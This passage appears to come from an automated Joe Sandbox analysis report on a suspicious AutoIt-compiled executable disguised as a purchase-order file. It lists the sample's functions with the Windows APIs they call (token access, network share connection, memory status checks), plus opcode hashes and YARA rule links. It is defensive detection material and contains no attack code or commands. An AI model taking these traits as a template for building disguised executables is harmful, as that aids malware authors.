                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                        • String ID:
                        • API String ID: 2710830443-0
                        • Opcode ID: ebe7312e73eb94157c964c0253787d65589850be36311f3c97c16afbef4ffe7c
                        • Instruction ID: c138031c91b58598e30c287f7e88eccb9b6187659cc7401fd5f638c0a331a5f9
                        • Opcode Fuzzy Hash: ebe7312e73eb94157c964c0253787d65589850be36311f3c97c16afbef4ffe7c
                        • Instruction Fuzzy Hash: 85E06D31541268BBDB211FA2FC0EEDB7F2CEF117A1F808010B51D85060CAB19590CBA0
                        Function 002EBDF8 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThread.KERNEL32 ref: 002EBE01
                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,002EB9C9), ref: 002EBE08
                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002EB9C9), ref: 002EBE15
                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,002EB9C9), ref: 002EBE1C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CurrentOpenProcessThreadToken
                        • String ID:
                        • API String ID: 3974789173-0
                        • Opcode ID: d2812ec001d000a34bd444b1d44dff9206213d4587ecef9f35ce01d33562cebb
                        • Instruction ID: 49abc156a7fb762594f04e873f15846346a75b434b6759feaf2a89d4be6afd62
                        • Opcode Fuzzy Hash: d2812ec001d000a34bd444b1d44dff9206213d4587ecef9f35ce01d33562cebb
                        • Instruction Fuzzy Hash: F7E08636A412119BD7121FB1AD0CBD73BACFF54BA2F048818F245DA040D7348451CB61
                        Function 002CB0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                        • GetSysColor.USER32(00000008), ref: 002CB0C5
                        • SetTextColor.GDI32(?,000000FF), ref: 002CB0CF
                        • SetBkMode.GDI32(?,00000001), ref: 002CB0E4
                        • GetStockObject.GDI32(00000005), ref: 002CB0EC
                        • GetWindowDC.USER32(?,00000000), ref: 0032ECFA
                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0032ED07
                        • GetPixel.GDI32(00000000,?,00000000), ref: 0032ED20
                        • GetPixel.GDI32(00000000,00000000,?), ref: 0032ED39
                        • GetPixel.GDI32(00000000,?,?), ref: 0032ED59
                        • ReleaseDC.USER32(?,00000000), ref: 0032ED64
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                        • String ID:
                        • API String ID: 1946975507-0
                        • Opcode ID: 7765df7343a2de9ed9d74c65d2d077c63459d6a1d4d43a3caf8a6bae8aca838d
                        • Instruction ID: da6911e961b1e73311bf93a0220de813c206eb310b161972d15eb812c3ee597a
                        • Opcode Fuzzy Hash: 7765df7343a2de9ed9d74c65d2d077c63459d6a1d4d43a3caf8a6bae8aca838d
                        • Instruction Fuzzy Hash: B7E0ED31504240AFEB635F74BC8ABD83B25AB56336F148366F669580E2C7B24590DB11
                        Function 002EC066 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                        Download Yara Rule
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 002EC071
                        • UnloadUserProfile.USERENV(?,?), ref: 002EC07D
                        • CloseHandle.KERNEL32(?), ref: 002EC086
                        • CloseHandle.KERNEL32(?), ref: 002EC08E
                          • Part of subcall function 002EB850: GetProcessHeap.KERNEL32(00000000,?,002EB574), ref: 002EB857
                          • Part of subcall function 002EB850: HeapFree.KERNEL32(00000000), ref: 002EB85E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                        • String ID:
                        • API String ID: 146765662-0
                        • Opcode ID: f0f33e69db630688dfb43533a804e84e11e68f9ed97608f49615acee74f1f47e
                        • Instruction ID: dad210e5009ebc2fb3dba07080cf21aed629c6edbb114a5bd3474315f24b6af8
                        • Opcode Fuzzy Hash: f0f33e69db630688dfb43533a804e84e11e68f9ed97608f49615acee74f1f47e
                        • Instruction Fuzzy Hash: EEE0BF36504006BBCB426FA5ED48859FB2EFF49321B104325F61581571CB326431EB90
                        Function 0032C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 318b329e3924bedeca46b821c4a486d1a2f23c267ee7b015cd49549d384d4781
                        • Instruction ID: da7e2d937df8b92a60e8ec34b145b39329ec18825a5632d355e2f8354269f24c
                        • Opcode Fuzzy Hash: 318b329e3924bedeca46b821c4a486d1a2f23c267ee7b015cd49549d384d4781
                        • Instruction Fuzzy Hash: 7CE046B1510200EFDB025F70EC89A693BADEB4C360F51C409FC5A8B210DBB999808F40
                        Function 0032C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CapsDesktopDeviceReleaseWindow
                        • String ID:
                        • API String ID: 2889604237-0
                        • Opcode ID: 1fbf81f8edb87c6e05a5745eb237d4433432e6176a8f9202229c4ed94214c885
                        • Instruction ID: 121204827a2fef4a5a7fead31981c86f386ece79afd86d761edd57a4398a47e3
                        • Opcode Fuzzy Hash: 1fbf81f8edb87c6e05a5745eb237d4433432e6176a8f9202229c4ed94214c885
                        • Instruction Fuzzy Hash: 78E046B1510200EFDB025F70EC89A693BA9EB4C3A0F518409F95A8B210DBB999808F40
                        Function 002D4C3D Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                        Download Yara Rule
                        APIs
                        • __getptd_noexit.LIBCMT ref: 002D4C3E
                          • Part of subcall function 002D86B5: GetLastError.KERNEL32(?,002D0127,002D88A3,002D4673,?,?,002D0127,?,002B125D,00000058,?,?), ref: 002D86B7
                          • Part of subcall function 002D86B5: __calloc_crt.LIBCMT ref: 002D86D8
                          • Part of subcall function 002D86B5: GetCurrentThreadId.KERNEL32 ref: 002D8701
                          • Part of subcall function 002D86B5: SetLastError.KERNEL32(00000000,002D0127,002D88A3,002D4673,?,?,002D0127,?,002B125D,00000058,?,?), ref: 002D8719
                        • CloseHandle.KERNEL32(?,?,002D4C1D), ref: 002D4C52
                        • __freeptd.LIBCMT ref: 002D4C59
                        • ExitThread.KERNEL32 ref: 002D4C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                        • String ID:
                        • API String ID: 408300095-0
                        • Opcode ID: f761d38d48ec19eb91d72265cb05a888e3e1e7c85c692650673f993ba7f2c115
                        • Instruction ID: 069870b860c5ac2a5fd8c62b2d018c8311b4283f3e5a3b49ef7fdcd4588dcef2
                        • Opcode Fuzzy Hash: f761d38d48ec19eb91d72265cb05a888e3e1e7c85c692650673f993ba7f2c115
                        • Instruction Fuzzy Hash: DFD0A731422A524BC1323B209D0E60D32585F01B35F014307F075052E19F30DC214AD1
                        Function 00332350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: >$DEFINE
                        • API String ID: 4104443479-1664449232
                        • Opcode ID: dddcc2e52b7359011d5195d1aade887d931d53f27691056e2d28e733baf3235d
                        • Instruction ID: 79ce6079d3fd4e73f5d79cfc0fe34fbd6d8e459d0288ac2130ae11bd05027a04
                        • Opcode Fuzzy Hash: dddcc2e52b7359011d5195d1aade887d931d53f27691056e2d28e733baf3235d
                        • Instruction Fuzzy Hash: 81126874A1020ADFCF25CF99C4D0AEDB7B1FF48350F26815AE849AB251D734AE95CB90
                        Function 002EEAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                        Download Yara Rule
                        APIs
                        • OleSetContainedObject.OLE32(?,00000001), ref: 002EECA0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ContainedObject
                        • String ID: AutoIt3GUI$Container
                        • API String ID: 3565006973-3941886329
                        • Opcode ID: ac769bb5394edc477bae9c439d902a6bfb31986fc64a35e11055ddc17ba6a996
                        • Instruction ID: 72c285829972c472790b11e8548ae93283a87aa8e6053bfb7a9df1652db8f134
                        • Opcode Fuzzy Hash: ac769bb5394edc477bae9c439d902a6bfb31986fc64a35e11055ddc17ba6a996
                        • Instruction Fuzzy Hash: E79168746507029FDB14CF65C884B6ABBF9BF48710F65846EF84ACB291DBB0E851CB60
                        Function 002FE704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B3BCF: _wcscpy.LIBCMT ref: 002B3BF2
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                        • __wcsnicmp.LIBCMT ref: 002FE785
                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 002FE84E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                        • String ID: LPT
                        • API String ID: 3222508074-1350329615
                        • Opcode ID: ce74e90a5f1c1ff5f04cec3343933628693e347c62fc08e02525136788bc5b7b
                        • Instruction ID: 55fe7bf98e78437d913dca1c0eeb5abd332e3912ab45fee0a9307533ebc86bda
                        • Opcode Fuzzy Hash: ce74e90a5f1c1ff5f04cec3343933628693e347c62fc08e02525136788bc5b7b
                        • Instruction Fuzzy Hash: 22617375A20219AFDF15EF54C895EFEF7B4AF48390F014069F616AB2A0DB70AE50CB50
                        Function 002B1B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNEL32(00000000), ref: 002B1B83
                        • GlobalMemoryStatusEx.KERNEL32 ref: 002B1B9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: GlobalMemorySleepStatus
                        • String ID: @
                        • API String ID: 2783356886-2766056989
                        • Opcode ID: 1a781124b82a235ae85788623a10a253b7e90a0441a107228f96aab7d34b049d
                        • Instruction ID: ccff0f78a1e14270889173e90a6b6a2dd6881749075ffc37b1707ab4a523b8bf
                        • Opcode Fuzzy Hash: 1a781124b82a235ae85788623a10a253b7e90a0441a107228f96aab7d34b049d
                        • Instruction Fuzzy Hash: A4514971418784ABE321AF14D885FABBBECFB95394F81484DF1C8410A6EF71856C8B56
                        Function 002FCE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B417D: __fread_nolock.LIBCMT ref: 002B419B
                        • _wcscmp.LIBCMT ref: 002FCF49
                        • _wcscmp.LIBCMT ref: 002FCF5C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscmp$__fread_nolock
                        • String ID: FILE
                        • API String ID: 4029003684-3121273764
                        • Opcode ID: d7f361c81192b67362fe2fc88e807e3555a2635749219c09082af17b52aaa546
                        • Instruction ID: ffc74971bfb0d0df24f190851101b6f2307ece3983f145c0fd1a418a1e232cce
                        • Opcode Fuzzy Hash: d7f361c81192b67362fe2fc88e807e3555a2635749219c09082af17b52aaa546
                        • Instruction Fuzzy Hash: 0441E532A2021DBADF11EFA4CC81FEFBBB99F49750F10047AF605A7191D7719A548B60
                        Function 002D9AF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        • __getbuf.LIBCMT ref: 002D9B8A
                        • __lseeki64.LIBCMT ref: 002D9BFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __getbuf__getptd_noexit__lseeki64
                        • String ID: pM.
                        • API String ID: 3311320906-850496965
                        • Opcode ID: 5b6645c268fd5bc7f8487476c48d39fa9f14dd8134cf0cdf4d08057ac107750d
                        • Instruction ID: e0f619c5f898e8fda68cee9a07b2e8d3ce40f5e962a3d77b634c926d6bedfc1f
                        • Opcode Fuzzy Hash: 5b6645c268fd5bc7f8487476c48d39fa9f14dd8134cf0cdf4d08057ac107750d
                        • Instruction Fuzzy Hash: 2541E071530B069ED7349F28D891A7A77E89B49324F15861FF4AA8B3D1D7B4DCA08F10
                        Function 0031A578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0031A668
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0031A67D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID: '
                        • API String ID: 3850602802-1997036262
                        • Opcode ID: d7657c856b1b8e217e071a65690292a59626f53ad800b645ff04cdf6bcb0b835
                        • Instruction ID: 9b3567940489f804b3b9ec3550dd7dcd7ec4ca829c224dcbd992e73dc578e9d7
                        • Opcode Fuzzy Hash: d7657c856b1b8e217e071a65690292a59626f53ad800b645ff04cdf6bcb0b835
                        • Instruction Fuzzy Hash: 11412875A01709AFDB15CF68C880BDA7BB9FF09341F14006AE959EB341D770A981CF91
                        Function 00319567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(?,?,?,?), ref: 0031961B
                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00319657
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$DestroyMove
                        • String ID: static
                        • API String ID: 2139405536-2160076837
                        • Opcode ID: b27f46884ccba1da81b0b4848571809ba71a1561008f0794a93189fe31a778ba
                        • Instruction ID: e06b1a3be4fa8e5369820f44b5dc4cde213eba49c2c2ed9a9ed463e9b6e2b18b
                        • Opcode Fuzzy Hash: b27f46884ccba1da81b0b4848571809ba71a1561008f0794a93189fe31a778ba
                        • Instruction Fuzzy Hash: 3531CA31100604AAEB168F68DC91FFB73A9FF4C760F01861AF8A987190CA31AC918B60
                        Function 002F5B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 002F5BE4
                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002F5C1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: InfoItemMenu_memset
                        • String ID: 0
                        • API String ID: 2223754486-4108050209
                        • Opcode ID: 35f4412af0ffc6cc0d863da60c7caad933012aed5bd83da55dd381b2d7cc2594
                        • Instruction ID: bc13a98ec4bc4b49d9a156d74d42c27ddcafc40fb39e777246b49a497a9b3897
                        • Opcode Fuzzy Hash: 35f4412af0ffc6cc0d863da60c7caad933012aed5bd83da55dd381b2d7cc2594
                        • Instruction Fuzzy Hash: 4B31C53151071EABDB258F99D985BBDFBF8AF05390F18003AEB86961A0D7B09964CF50
                        Function 00306B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                        Download Yara Rule
                        APIs
                        • __snwprintf.LIBCMT ref: 00306BDD
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __snwprintf_memmove
                        • String ID: , $$AUTOITCALLVARIABLE%d
                        • API String ID: 3506404897-2584243854
                        • Opcode ID: 3e9a122f671d75187c24296d462cecbb39bd5aa907453cc7d19d0b6738749cad
                        • Instruction ID: 2a1b8e2ddd6bba671085c8bc3257862ffb0f63dcccd8034a03b6a3c100da006d
                        • Opcode Fuzzy Hash: 3e9a122f671d75187c24296d462cecbb39bd5aa907453cc7d19d0b6738749cad
                        • Instruction Fuzzy Hash: D7219131610118AACF02EF94CC92EED77B5EF44740F104469F546AB186DB71EE66CFA1
                        Function 003191DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                        Download Yara Rule
                        APIs
